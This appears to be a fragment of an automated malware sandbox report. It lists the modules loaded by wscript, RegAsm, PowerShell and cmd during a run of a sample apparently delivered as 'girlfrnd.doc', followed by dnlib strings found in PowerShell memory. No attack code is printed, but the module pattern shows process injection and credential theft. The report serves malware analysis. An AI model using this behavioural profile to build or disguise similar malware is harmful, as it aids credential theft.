            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: girlfrnd.LNK.0.drLNK file: ..\..\..\..\..\Desktop\girlfrnd.doc
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000015.00000002.889873904.0000000004FFE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
